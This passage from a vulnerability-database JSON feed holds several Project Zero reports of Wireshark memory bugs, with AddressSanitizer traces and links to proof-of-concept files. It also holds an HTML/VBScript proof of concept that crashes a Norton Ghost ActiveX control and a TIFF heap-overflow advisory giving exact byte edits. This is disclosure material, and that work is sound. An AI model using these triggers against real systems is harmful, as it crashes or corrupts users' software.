wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/26008", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T03:19:33", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2016-03-31T00:00:00", "published": "2016-03-31T00:00:00", "href": "https://0day.today/exploit/description/25907", "id": "1337DAY-ID-25907", "type": "zdt", "title": "Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=754\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==17304==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004507c1 bp 0x7fff09b13420 sp 0x7fff09b12bd0\r\nREAD of size 1431 at 0x61b00001335c thread T0\r\n #0 0x4507c0 in __interceptor_strlen llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581\r\n #1 0x7fead8aeeb02 in g_strdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b02)\r\n #2 0x7feae0a0b1ef in string_fvalue_set_string wireshark/epan/ftypes/ftype-string.c:51:30\r\n #3 0x7feae09e83f8 in fvalue_set_string wireshark/epan/ftypes/ftypes.c:530:2\r\n #4 0x7feae0867874 in proto_tree_set_string wireshark/epan/proto.c:3572:3\r\n #5 0x7feae088ae05 in proto_tree_add_string wireshark/epan/proto.c:3478:2\r\n #6 0x7feae088b135 in proto_tree_add_string_format_value wireshark/epan/proto.c:3492:7\r\n #7 0x7feae213aa61 in dissect_pktc_rekey wireshark/epan/dissectors/packet-pktc.c:436:5\r\n #8 0x7feae2139f71 in dissect_pktc wireshark/epan/dissectors/packet-pktc.c:624:16\r\n #9 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #10 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #11 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #12 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9\r\n #13 0x7feae296ebf5 in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:583:7\r\n #14 0x7feae297dc90 in dissect wireshark/epan/dissectors/packet-udp.c:1081:5\r\n #15 0x7feae29719d0 in dissect_udp wireshark/epan/dissectors/packet-udp.c:1087:3\r\n #16 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #17 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #18 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #19 0x7feae19601db in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1978:7\r\n #20 0x7feae19cf7c1 in dissect_ipv6 wireshark/epan/dissectors/packet-ipv6.c:2431:14\r\n #21 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #22 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #23 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #24 0x7feae0805dc4 in dissector_try_uint wireshark/epan/packet.c:1186:9\r\n #25 0x7feae1fde9c9 in dissect_null wireshark/epan/dissectors/packet-null.c:458:12\r\n #26 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #27 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #28 0x7feae080521d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #29 0x7feae1542dd5 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #30 0x7feae08130d1 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #31 0x7feae0805a4a in call_dissector_work wireshark/epan/packet.c:701:9\r\n #32 0x7feae080f58e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #33 0x7feae0800f4f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #34 0x7feae0800324 in dissect_record wireshark/epan/packet.c:509:3\r\n #35 0x7feae07b36c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #36 0x52f11b in process_packet wireshark/tshark.c:3748:5\r\n #37 0x52840c in load_cap_file wireshark/tshark.c:3504:11\r\n #38 0x51e71c in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2148 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7fead8ad7610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7feaed2fef08 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x52473d in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51e12d in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:581 in __interceptor_strlen\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==17304==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12242. Attached is a file which triggers the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39644.zip\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/25907", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-02T01:08:54", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-03-23T00:00:00", "published": "2016-03-23T00:00:00", "href": "https://0day.today/exploit/description/25896", "id": "1337DAY-ID-25896", "type": "zdt", "title": "Wireshark - dissect_ber_integer Static Out-of-Bounds Write", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=750\r\n \r\nThe following crash due to a static memory out-of-bounds write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==28209==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fde2f36bfc4 at pc 0x7fde25b1332c bp 0x7fffe48bc670 sp 0x7fffe48bc668\r\nWRITE of size 4 at 0x7fde2f36bfc4 thread T0\r\n #0 0x7fde25b1332b in dissect_ber_integer epan/dissectors/packet-ber.c:2001:16\r\n #1 0x7fde27f46621 in dissect_kerberos_ADDR_TYPE epan/dissectors/../../asn1/kerberos/kerberos.cnf:351:12\r\n #2 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17\r\n #3 0x7fde27f4656f in dissect_kerberos_HostAddress epan/dissectors/../../asn1/kerberos/kerberos.cnf:233:12\r\n #4 0x7fde25b1959a in dissect_ber_sequence epan/dissectors/packet-ber.c:2415:17\r\n #5 0x7fde27f4badf in dissect_kerberos_EncKrbPrivPart epan/dissectors/../../asn1/kerberos/kerberos.cnf:407:12\r\n #6 0x7fde25b040f7 in dissect_ber_tagged_type epan/dissectors/packet-ber.c:695:18\r\n #7 0x7fde27f42384 in dissect_kerberos_ENC_KRB_PRIV_PART epan/dissectors/../../asn1/kerberos/kerberos.cnf:417:12\r\n #8 0x7fde25b1f100 in dissect_ber_choice epan/dissectors/packet-ber.c:2917:21\r\n #9 0x7fde27f4139a in dissect_kerberos_Applications epan/dissectors/../../asn1/kerberos/kerberos.cnf:185:12\r\n #10 0x7fde27f3f7b2 in dissect_kerberos_common epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2103:10\r\n #11 0x7fde27f3e22f in dissect_kerberos_main epan/dissectors/../../asn1/kerberos/packet-kerberos-template.c:2134:10\r\n #12 0x7fde26f3c34f in dissect_pktc_mtafqdn epan/dissectors/packet-pktc.c:566:15\r\n #13 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #14 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #15 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #16 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9\r\n #17 0x7fde277709e5 in decode_udp_ports epan/dissectors/packet-udp.c:583:7\r\n #18 0x7fde2777fa80 in dissect epan/dissectors/packet-udp.c:1081:5\r\n #19 0x7fde27773840 in dissect_udplite epan/dissectors/packet-udp.c:1094:3\r\n #20 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #21 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #22 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #23 0x7fde267660bb in ip_try_dissect epan/dissectors/packet-ip.c:1978:7\r\n #24 0x7fde26770de8 in dissect_ip_v4 epan/dissectors/packet-ip.c:2472:10\r\n #25 0x7fde26766819 in dissect_ip epan/dissectors/packet-ip.c:2495:5\r\n #26 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #27 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #28 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #29 0x7fde256072b4 in dissector_try_uint epan/packet.c:1186:9\r\n #30 0x7fde26f6e380 in dissect_ppp_common epan/dissectors/packet-ppp.c:4344:10\r\n #31 0x7fde26f6db3c in dissect_ppp_hdlc_common epan/dissectors/packet-ppp.c:5337:5\r\n #32 0x7fde26f65df5 in dissect_ppp_hdlc epan/dissectors/packet-ppp.c:5378:5\r\n #33 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #34 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #35 0x7fde2560670d in dissector_try_uint_new epan/packet.c:1160:9\r\n #36 0x7fde2634fe55 in dissect_frame epan/dissectors/packet-frame.c:493:11\r\n #37 0x7fde256145c1 in call_dissector_through_handle epan/packet.c:626:8\r\n #38 0x7fde25606f3a in call_dissector_work epan/packet.c:701:9\r\n #39 0x7fde25610a7e in call_dissector_only epan/packet.c:2674:8\r\n #40 0x7fde2560243f in call_dissector_with_data epan/packet.c:2687:8\r\n #41 0x7fde25601814 in dissect_record epan/packet.c:509:3\r\n #42 0x7fde255b4bb9 in epan_dissect_run_with_taps epan/epan.c:376:2\r\n #43 0x52f11b in process_packet tshark.c:3748:5\r\n #44 0x52840c in load_cap_file tshark.c:3504:11\r\n #45 0x51e71c in main tshark.c:2213:13\r\n \r\n0x7fde2f36bfc4 is located 4 bytes to the right of global variable 'cb' defined in 'packet-pktc.c:539:27' (0x7fde2f36bfa0) of size 32\r\nSUMMARY: AddressSanitizer: global-buffer-overflow epan/dissectors/packet-ber.c:2001:16 in dissect_ber_integer\r\nShadow bytes around the buggy address:\r\n 0x0ffc45e657a0: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9\r\n 0x0ffc45e657b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9\r\n 0x0ffc45e657c0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00\r\n 0x0ffc45e657d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e657e0: 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9\r\n=>0x0ffc45e657f0: f9 f9 f9 f9 00 00 00 00[f9]f9 f9 f9 00 00 00 00\r\n 0x0ffc45e65800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0ffc45e65840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==28209==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12206. Attached is a file which triggers the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39604.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25896", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-06T01:48:14", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-03-07T00:00:00", "published": "2016-03-07T00:00:00", "href": "https://0day.today/exploit/description/25861", "id": "1337DAY-ID-25861", "type": "zdt", "title": "Wireshark - wtap_optionblock_free Use-After-Free", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=739\r\n \r\nThe following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==6853==ERROR: AddressSanitizer: heap-use-after-free on address 0x60400009d960 at pc 0x7ff7905dc0fe bp 0x7fff079e9fc0 sp 0x7fff079e9fb8\r\nREAD of size 4 at 0x60400009d960 thread T0\r\n #0 0x7ff7905dc0fd in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:161:20\r\n #1 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4\r\n #2 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #3 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x60400009d960 is located 16 bytes inside of 40-byte region [0x60400009d950,0x60400009d978)\r\nfreed by thread T0 here:\r\n #0 0x4c1d80 in __interceptor_free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30\r\n #1 0x7ff7905dc32f in wtap_optionblock_free wireshark/wiretap/wtap_opttypes.c:173:9\r\n #2 0x7ff7905d7b58 in wtap_close wireshark/wiretap/wtap.c:1211:4\r\n #3 0x52a08b in load_cap_file wireshark/tshark.c:3685:3\r\n #4 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\npreviously allocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7ff77bc84610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35\r\n #3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7\r\n #4 0x528036 in load_cap_file wireshark/tshark.c:3499:12\r\n #5 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\nSUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free\r\nShadow bytes around the buggy address:\r\n 0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa\r\n=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa\r\n 0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa\r\n 0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==6853==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39529.zip\n\n# 0day.today [2018-04-06] #", "sourceHref": "https://0day.today/exploit/25861", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-08T15:07:44", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2009-04-23T00:00:00", "published": "2009-04-23T00:00:00", "id": "1337DAY-ID-6843", "href": "https://0day.today/exploit/description/6843", "type": "zdt", "title": "Norton Ghost Support module for EasySetup wizard Remote DoS PoC", "sourceData": "===============================================================\r\nNorton Ghost Support module for EasySetup wizard Remote DoS PoC\r\n===============================================================\r\n\r\n\r\n-----------------------------------------------------------------------------------------\r\n Norton Ghost Support module for EasySetup wizard Remote DoS/Arbitrary code execution(?)\r\n url: http://www.symantec.com/\r\n\r\n Author: shinnai\r\n\r\n File: EasySetupInt.dll\r\n Ver.: 14.0.4.30167\r\n ProgID: Symantec.EasySetup.1\r\n Descr.: CEasySetup Object - Support module for EasySetup wizard\r\n \r\n Marked as: RegKey Safe for Script: True\r\n RegKey Safe for Init: True\r\n Implements IObjectSafety: False\r\n KillBitSet: False\r\n\r\n Bug info: This component contains methods which lead into a denial of\r\n service.\r\n This is the list of components:\r\n\r\n \"GetBackupLocationPath\"\r\n \"CallUninstall\"\r\n \"SetupDeleteVolume\"\r\n \"CanUseEasySetup\"\r\n \"CallAddInitialProtection\"\r\n \"CallTour\"\r\n\r\n Crash happens here:\r\n\r\n 03A6B9D6 8B10 MOV EDX,DWORD PTR DS:[EAX]\r\n\r\n And registers risuation is:\r\n \r\n EAX 00000000\r\n ECX 774F9997 ole32.774F9997\r\n EDX 019DCB04\r\n EBX 00000000\r\n ESP 019DCAE4\r\n EBP 019DCB9C\r\n ESI 019DCCB8\r\n EDI 00000001\r\n EIP 03A6B9D6 EasySetu.03A6B9D6\r\n\r\n Unfortunately the vulnerability seems to be unexploitable, anyway\r\n I've found a way to execute arbitrary code but it's useless \r\n because requires a high level of user interaction to work.\r\n That's why it will remain private.\r\n I hope that someone else will be able to exploit this vuln\r\n using more convenient ways.\r\n\r\n Peace \r\n\r\n This was written for educational purpose. Use it at your own risk.\r\n Author will be not responsible for any damage.\r\n\r\n Tested on Windows XP Professional SP3 with Internet Explorer 7\r\n-----------------------------------------------------------------------------------------\r\n<object classid='clsid:7972D5BE-2213-4B28-884C-F8F82432EAA5' id='test'></object>\r\n\r\n<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\r\n\r\n<script language='vbscript'>\r\n Sub tryMe\r\n test.SetupDeleteVolume()\r\n End Sub\r\n</script>\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6843"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2015-08-24T00:00:00", "published": "2015-08-24T00:00:00", "id": "SECURITYVULNS:VULN:14657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14657", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "description": "Predictable CSRF tokens.", "modified": "2015-08-24T00:00:00", "published": "2015-08-24T00:00:00", "id": "SECURITYVULNS:VULN:14658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14658", "title": "WiFi Pineapple protection bypass", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:VULN:13764", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13764", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "description": "=======\r\nSummary\r\n=======\r\nName: Apple OSX / iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow \r\nReference: NGS00062\r\nDiscoverer: Dominic Chell <dominic.chell@ngssecure.com>\r\nVendor: Apple\r\nVendor Reference: 145575681\r\nSystems Affected: Apple OSX / iPhone iOS / Possibly others using LibTiff\r\nRisk: High\r\nStatus: Fixed\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 27 February 2011\r\nReleased: 27 February 2011\r\nApproved: 29 March 2011\r\nReported: 29 March 2011\r\nFixed: 23 June 2011\r\nPublished: 10 October 2011\r\n\r\n===========\r\nDescription\r\n===========\r\nHeap overflow caused by overly large tilewidth image tag in getBandProcTiff()\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nThe Offset 8BE6 is changed from 17 to 42. This field is the tiff tag StripByteCounts. Valid value is 1701 which signifies the StripByteCounts tiff tag Flipping the stripbytescount field to 4201 causes the \r\n\r\nstripbytescount tag to be removed for the first page in the tiff image and be replaced with the tilewidth image tag. The definition of this image tag can be found here:\r\nhttp://www.awaresystems.be/imaging/tiff/tifftags/tilewidth.html\r\n\r\nThe value for the tilewidth tag is read from 8BEE to 8BF1 inclusive. Setting the tilewidth to 00800000 (8388608) causes the following crash:\r\n\r\nProgram received signal EXC_BAD_ACCESS, Could not access memory.\r\nReason: KERN_INVALID_ADDRESS at address: 0x00000001007ca000\r\n[Switching to process 2342]\r\n0x00007fffffe00847 in __memcpy ()\r\n(gdb) i r\r\nrax 0xffffffffeb790000 -344391680\r\nrbx 0x10078c000 4302880768\r\nrcx 0xfffffffffff3e000 -794624\r\nrdx 0x0 0\r\nrsi 0x1150fc000 4648321024\r\nrdi 0x10088c000 4303929344\r\nrbp 0x102ed7790 0x102ed7790\r\nrsp 